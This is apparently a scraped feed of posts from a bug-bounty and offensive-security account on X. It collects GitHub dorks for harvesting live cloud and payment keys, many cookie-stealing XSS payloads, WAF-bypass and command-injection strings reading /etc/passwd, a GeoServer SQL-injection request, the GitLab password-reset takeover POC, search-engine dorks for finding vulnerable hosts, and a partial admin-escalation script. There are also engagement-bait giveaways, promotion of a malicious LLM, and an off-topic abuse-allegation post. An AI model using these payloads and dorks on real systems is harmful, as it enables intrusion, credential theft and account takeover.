"I Found [---] Private Keys in Public GitHub Repos In [--] Hours. No Login. No Tools. Just Pure OSINT. [--]. No scanners. No bug bounty platforms. No rate limits. Just me a few dorks and one dirty automation loop. In a single day I uncovered: AWS root keys Stripe live tokens GitHub deploy secrets Google Cloud service creds All public. All real. [--]. Step 1: Advanced GitHub Dorking Most of you stop at .env. That's rookie mode. You want the real gold Use: filename:.env AWS_SECRET_ACCESS_KEY extension:json "private_key" NOT test stripe live_ path:/config prod AND "password" Then chain these with:"
X Link 2025-05-10T02:32Z 26.5K followers, [----] engagements
"ONLY for [--] people: I'm dropping my REAL OSCP exam report [--] pages full of working Nmap scans FTP exploits Active Directory enumeration & privilege escalation paths. This is NOT public. It's PRIVATE. If this post hits 1M impressions I'm choosing [--] winners. TO ENTER: LIKE, REPOST, FOLLOW, COMMENT: I'm ready to earn my OSCP. Winners will be contacted directly. Let's see who's serious. #OSCP #BugBounty #Hacking #CyberSecurity #Infosec #RedTeam"
X Link 2025-06-02T17:30Z 27.6K followers, 38.6K engagements
"KaliGPT Redefining Cybersecurity with AI-Powered Precision. In a world where threats evolve fast KaliGPT is your tactical edge. Dive into the tech: Go straight to the chat: #CyberSecurity #AI #KaliGPT #BugBounty #InfoSec https://chat.openai.com/g/g-uRhIB5ire-kali-gpt https://xis10cial.com/ai/%F0%9F%90%89kali-gpt/"
X Link 2025-06-15T13:58Z 27K followers, [----] engagements
"CVE-2025-49113: PostAuth Remote Code Execution in Roundcube via PHP Object Deserialization FOFA Link: FOFA Query: app="roundcube" Results: [--------] CVSS: [---] https://nvd.nist.gov/vuln/detail/CVE-2025-49113 https://en.fofa.info/resultqbase64=YXBwPSJyb3VuZGN1YmUi"
X Link 2025-06-15T20:39Z 28.8K followers, 14.5K engagements
"CVE-2025-3248 Remote and unauthenticated attacker can send crafted HTTP requests to execute arbitrary code Finding Targets To find potential targets use Fofa Fofa Dork: "Langflow" Cloning the Repository First clone the repository: git clone Run the Exploit: python3 Target:port cmd #BugBounty #bugbountytips http://CVE-2025-3248.py https://github.com/verylazytech/CVE-2025-3248"
X Link 2025-06-17T05:02Z 28.8K followers, [----] engagements
"CVE-2024-55591: Fortinet FortiOS Authentication Bypass ZoomEye Link: ZoomEye Dork: app="Fortinet Firewall" Results: [-------] Advisory: PoC: CVSS: [---] https://github.com/watchtowrlabs/fortios-auth-bypass-poc-CVE-2024-55591 https://nvd.nist.gov/vuln/detail/cve-2024-55591 https://www.zoomeye.ai/searchResultq=YXBwPSJGb3J0aW5ldCBGaXJld2FsbCI%3D"
X Link 2025-06-17T18:13Z 27.7K followers, [----] engagements
"I brought you the Recon Trinity. It's not just a one-liner. It's a precision-engineered killchain-driven pipeline that unites the raw crawling power of Katana the validation muscle of HTTPX and the surgical strike capabilities of Nuclei. For the hunters. The ghosts. The ones who see signal through noise. Let me introduce you to the Holy Recon Trinity: Katana Crawl Deep JS-Aware HTTPX Validate Enrich Strip the Dead Weight Nuclei Attack Audit Exploit Who What When Where Why And how Eminem The Way I Am and also every solid hacker asking the right questions. The One-Liner That Changes"
X Link 2025-06-19T14:23Z 27.7K followers, 12.4K engagements
"Offensive Security notes Welcome to the Linux Privilege Escalation Guide within my OSCP [----] (Offensive Security Certified Professional) notes. "Access to my OSCP Linux Privilege Escalation notes is limited to a select group. First [----] people are eligible to receive access to OSCP Notes If you'd like to receive these notes please follow me repost and drop Yes and send me a private direct message. This offer is exclusively for verified users not new accounts." In this comprehensive resource we will explore the intricacies of escalating privileges on Linux systems providing"
X Link 2025-06-27T03:30Z 28.1K followers, 29.4K engagements
"EXPOSED: $5000+ AI AGENTS LEAKED (Free Access) 200+ plug-and-play AI agents built for social media sales scraping support content devops & more just went public. Agents include: Social Media Agents ($8K builds); Lead Booking / Cold Outreach ($6K); Data Scraping Agents ($8K+); Customer Support & HR ($5K+); Creative / Legal / DevOps / Analytics and more. 20+ industries. Hundreds of automation-ready agents. All workflows optimized for n8n Zapier and custom stacks. I'm giving away the entire Google Drive for FREE. Only for [--] hours. RT + Follow + Comment AGENTS and I'll DM"
X Link 2025-07-07T21:03Z 28.1K followers, [----] engagements
"Elite-Level XLSX XXE Payload Delivery Chain for Web App Compromise & Bounty Farming TL;DR: Turn Excel Into an RCE Vector via Blind XXE Exploit the widespread assumption that .xlsx files are harmless. Embed XXE payloads inside Office XML files get blind interactions through Burp Collaborator and trigger internal server parsing potentially leading to: SSRF File exfiltration Credential leakage Cloud metadata access And even command execution Objective: Make Money with Excel Hacks You profit when: The Excel file upload feature leads to XXE You get outbound HTTP/DNS pings to Burp"
X Link 2025-07-09T18:17Z 28.1K followers, [----] engagements
"An OSINT tool to search for accounts by username and email in social networks. https://github.com/p1ngul1n0/blackbird"
X Link 2025-07-22T01:49Z 28.4K followers, [----] engagements
"XSS Payload Written In Arabic =''=+=+=+=++== =+++=++=+(.+)++++++++(+++++"(1)")() XSS Payload Written in Russian =''=+=+=+=++== =+++=++=+(.+)++++++++(+++++"('')")() XSS Payload Written in Ancient Indus Language π =''=+=+=+=++== =+++=+ +=+(.+)++++++++(+++++"('')")() XSS Payload Written In Japanese =''=+=+=+=++== =+++=+ +=+(.+)++++++++(+++++"('')")() XSS Payload Written In Chinese =''=+=+=+=++== =+++=+ +=+(.+)++++++++( +++++"('')" )()"
X Link 2025-08-06T17:33Z 28.4K followers, [----] engagements
"Reflected or Stored XSS: ----------------------------- scriptsvg/onload=promptdocument.cookie javascript:alert(document.domain); -- javaDISABLEscript:alert(document.domain); javanscript:alert(document.domain);// -- success iframe %00 src="	javascript:prompt(document.cookie)	"%00 script src="data:text/javascriptalert(1)"/script dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompta(origin)%20x u003cimgu0020srcu003dxu0020onerroru003du0022confirm(document.domain)u0022u003e u003cimgu0020srcu003dxu0020onerroru003du0022confirm(document.domain)u0022u003e"
X Link 2025-08-06T18:18Z 28.4K followers, [---] engagements
"Reflected or Stored XSS: ----------------------------- scriptsvg/onload=promptdocument.cookie javascript:alert(document.domain); -- javaDISABLEscript:alert(document.domain); javanscript:alert(document.domain);// -- success iframe %00 src="	javascript:prompt(document.cookie)	"%00 script src="data:text/javascriptalert(1)"/script dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompta(origin)%20x u003cimgu0020srcu003dxu0020onerroru003du0022confirm(document.domain)u0022u003e u003cimgu0020srcu003dxu0020onerroru003du0022confirm(document.domain)u0022u003e"
X Link 2025-08-06T18:19Z 28.4K followers, [---] engagements
"Traitor - Exploit Low-Hanging Fruit Automatically - Nearly all of GTFOBins Writeable docker.sock CVE-2022-0847 (Dirty pipe) CVE-2021-4034 (pwnkit) CVE-2021-3560 - Repo: - Creator: @liam_galvin - - #infosec #CTF #CyberSecurity #bugbountytips #linux https://github.com/liamg/traitor"
X Link 2023-09-25T07:49Z 30K followers, [----] engagements
"Ridiculously fast DNS/Network/Port Scanner - (Skanuvaty) - In testing I was able to discover 1000's of subdomains in less than [--] seconds. Check the repo for more info - Repo: - Creator: @Esc4iCEscEsc - #CyberSecurity #bugbountytips #CTF #infosec https://github.com/Esc4iCEscEsc/skanuvaty"
X Link 2023-09-27T08:01Z 28.8K followers, 32.8K engagements
"Free Complete Data Science https://mega.nz/folder/5Wp3nIiD#qsenYaT31KWhSEGGEAzOAQ"
X Link 2023-09-30T03:17Z 28.8K followers, 11.5K engagements
"If you've found an OS command Injection with WAF enabled special characters like (/"'&()-;:.) and whitespaces blocked. Try this method to bypass. - E.g.: reading /etc/passwd file: cat$IFS$9$PWD%%a-zec$PWD%%a-z*pss - Credit: Aysar Harb - #cybersecurity #pentesting"
X Link 2023-10-02T09:17Z 30K followers, 28.5K engagements
"Bug Bounty Tips and Tricks using CHATGPT #1 Download: Credit: Joas A #hacking #redteam #bugbounty #chatgpt #openai #AI https://drive.google.com/file/d/1_0HOT15PdQcPkNJ9UKepxQs6s7A1N00p/view"
X Link 2023-10-22T06:24Z 28.8K followers, 22.3K engagements
"CVE-2023-25157 GET /geoserver/owsservice=wfs&version=1.0.0&request=GetFeature&typeNamosloe=gwpd:chinamap11&CQL_FILTER=strStartsWith%28Vatican City%2C%27x%27%27%29+%3D+true+and+1%3D%28SELECT+CAST+%28%28SELECT+version()%29+AS+INTEGER%29%29+--+%27%29+%3D+true HTTP/1.1 #CVE #Poc https://twitter.com/i/web/status/1739190775752134770 https://twitter.com/i/web/status/1739190775752134770"
X Link 2023-12-25T07:46Z 30K followers, 18.1K engagements
"GitLab CVE-2023-7028 - Uncover account takeover potential with a simple password reset method. Known POC: useremail=valid@email.com&useremail=attacker@email.com Identifying vulnerable targets: [--]. Utilize the nuclei template to spot exposed Gitlab Instances. [--]. Hunt for potentially valid victim org emails through various sources. An effortless choice [--]. Install and execute the Python script on these hosts. If the target is vulnerable you'll likely receive an email on your attacker-controlled server. Usage: -u URL -v victim@example.com -a attacker@wearehackerone.com #BugBounty #recon"
X Link 2024-01-19T06:28Z 30K followers, 18.2K engagements
"Crazy Tool: Axiom is a dynamic infrastructure framework to efficiently work with multi-cloud environments build and deploy repeatable infrastructure focused on offensive and defensive security. #DAY12 [--]. The Introduction to Axiom tool [--]. Axiom Bug Bounty Tool Core Functionality [--]. Managing AXIOM Instances [--]. Creating Custom AXIOM Modules [--]. Mass Hunting For Misconfigured S3 Buckets (AXIOM) [--]. Mass Cross Site Scripting Hunting (AXIOM) [--]. Mass Hunting for Leaked Sensitive Documents (AXIOM) [--]. Hunting Blind XSS on the Large Scale Part1 Practical Techniques [--]. Hunting Blind XSS"
X Link 2024-02-16T04:55Z 28.8K followers, 17.2K engagements
"π₯ XSS PAYLOADS π₯ [--]. base href="alert(1)" onfocus="a = //(/+)$/.exec(baseURI); eval(a1);" tabindex=1 style="display:block" autofocus/base [--]. img%20hrEF="x"%20sRC="data:x"%20oNLy=1%20oNErrOR=prompt1 [--]. img+src=oNlY=1+ onerror="alert('a' 'x' 'b' 'x' 'c' 's'.map(c = c.replace(/abc/g '')).join(''))" [--]. img+src=oNlY=1+ onerror="alert('x' String.fromCharCode(121) 'x' 's'.filter(c = c.charCodeAt(0) == 121).join(''))" [--]. %3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E [--]. img/src/onerror=setTimeout(atob(/YWxlcnQoMTMzNyk/.source)) [--]. details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open"
X Link 2024-08-20T04:50Z 28.8K followers, 12.9K engagements
"This Guy is another level Top G Video surfaces of Andrew Tate allegedly beating on his sex slave @TateTheTalisman @Cobratate"
X Link 2025-02-27T03:35Z 25.1K followers, [--] engagements
"This Guy is another level Top G Let's share this please with everyone Video surfaces of Andrew Tate allegedly beating on his sex slave @TateTheTalisman @Cobratate"
X Link 2025-02-27T14:46Z 25.1K followers, [--] engagements
"π₯ Advanced Command Injection Playbook (2025+ Edition) [--] Command Injection Discovery (Modern Fuzzing) When normal payloads fail try character transformations + detection vectors: Unicode / Encoding / Special chars %7C && %26%26 ; %3B %60 $(cmd) $IFS$(cmd) or $IFS Trailing special characters (bypass sanitizers) whoami# whoami%0a whoami%0d%0a whoami;# Nested / obfuscated execution $(whoami) whoami $(echo d2hvYW1pCg== base64 -d) Payload padding (avoid WAF keyword detection) /bin///sh -c whoami echo$IFS"test" bash -c 'echo hacked' [--] Blind & Out Of Band (OOB) Command Injection Out of Band DNS /"
X Link 2025-05-06T04:46Z 28.8K followers, [----] engagements
"FREE Bug Bounty Course Drop From Zero Hero in Bug Bounty Hunting [--] Follow me [--] Turn on post notifications [--] Retweet this post Let's build the next wave of bug bounty hunters https://drive.google.com/drive/mobile/folders/1t-hTqg0-02t0cnc5SypHnb8t3CfE3bXU"
X Link 2025-10-10T04:18Z 28.8K followers, [----] engagements
"Why defenders & bug bounty hunters should care: KawaiiGPT: Free WormGPT variant GitHub: Write-up : https://unit42.paloaltonetworks.com/dilemma-of-ai-malicious-llms/ https://github.com/MrSanZz/KawaiiGPT"
X Link 2025-11-28T02:07Z 28.8K followers, [----] engagements
"POC for CVE-2025-55182 that works on Next.js 16.0.6 Here are the exact battle-tested queries you need Censys Shodan FOFA ZoomEye Quake BinaryEdge and Nuclei matchers all tuned specifically to find Next.js RSC / React Server Components instances vulnerable to CVE-2025-55182 (React2Shell). [--]. SHODAN QUERY (380K+ ASSETS) Find all servers leaking RSC Server Actions: Basic Query "Vary: RSC Next-Router-State-Tree" More Aggressive Variant http.headers.vary:"RSC" AND http.headers.vary:"Next-Router-State-Tree" Superwide Coverage "Next-Router-State-Tree" OR "x-nextjs-cache" OR "server-actions" OR"
X Link 2025-12-07T06:00Z 28.9K followers, [----] engagements
"AI is officially a Bug Bounty Cheat Code. Every top hunter is quietly building tools Here's mine. Just built a custom MCP server that lets AI analyze real logs like a senior DFIR engineer: Correlates WAF + auth logs in seconds; Detects brute-force clusters across entire attack surfaces; Uncovers coordinated attack campaigns you'd NEVER spot manually; Runs everything with sandboxed safe filesystem access. This is how big bounty hunters scale past luck and into repeatable 5-figure findings. If you're still hunting without AI you're already behind. Full breakdown here:"
X Link 2025-12-10T06:10Z 29.2K followers, 31.3K engagements
"EXTREME Google Dorks for CRITICAL File Upload Vulnerabilities (RCE Account Takeover Cloud Takeover Stored XSS Supply Chain) Most hunters stop at Upload File. Critical hunters hunt processing storage parsing and trust boundaries. This is where real money is [--]. Server-Side Processing Uploads (RCE Goldmine) These indicate background parsing conversion or execution. "Processing file" "File is being processed" "Your file is under review" "Parsing file" "Converting file" "File conversion started" "Upload successful processing" Why critical: FFmpeg / ImageMagick / LibreOffice / Pandoc"
X Link 2025-12-13T03:01Z 28.9K followers, [----] engagements
"Next.js wasn't built for this RSC RCE (CVE-2025-55182). Why This Beats @_coffinxp7 and @intigriti's Method : keyword grep runtime behavior guessing header+payload confirmation high noise ultra-low noise partial readiness immediate medium scale enterprise-grade Phase [--] Smart Tech Fingerprinting cat domains.txt httpx -silent -status-code -title -tech-detect -web-server -cdn -follow-redirects -path"
X Link 2025-12-14T04:55Z 29K followers, 18.4K engagements
"+ Browser Extensions Every Bug Bounty Hunter Should Know These tools help with recon XSS IDOR secrets discovery JS analysis and productivity. Bookmark this Secrets & Recon [--] TruffleHog Finds exposed API keys & secrets directly in websites [--] Wappalyzer Detects CMS frameworks analytics cloud providers [--] Finds company email patterns (useful for reporting & OSINT) [--] FindSomething Discovers hidden parameters & potential keys Exploitation & Testing [--] HackTools Payloads encoders wordlists one-click utilities [--] Edit Cookie Modify cookies inspect flags (Secure HttpOnly"
X Link 2025-12-27T07:11Z 30.6K followers, 26K engagements
"### Suggested Fix - Implement server-side API key management - Rotate all exposed credentials immediately - Add CSP headers to prevent inline script execution EOF # Create automated PoC script cat submission/poc/exploit.py 'PYTHON' #/usr/bin/env python3 import requests sys def exploit(target api_key): """Demonstrates full account takeover via exposed API key""" headers = "Authorization": f"Bearer api_key" # Step 1: Enumerate all users users = requests.get(f"target/api/v1/admin/users" headers=headers).json() print(f"+ Discovered len(users) users") # Step 2: Escalate to admin payload = "role":"
X Link 2025-12-29T07:06Z 29.1K followers, [---] engagements
"One of several new PoCs released recently sharing for the bug bounty community This PoC demonstrates automated detection and exploitation of a SQL injection vulnerability affecting Mura & Masa CMS powered applications. The issue abuses the contenthistid HTML query parameter in the /_api/json/v1/default endpoint. By appending the escape sequence %5c' it's possible to break out of the query context and inject arbitrary SQL payloads. The exploit is fully automated and integrated with Ghauri making it practical for large-scale hunting across vulnerable targets. All credit to the original author"
X Link 2026-01-02T04:16Z 29.3K followers, 10.6K engagements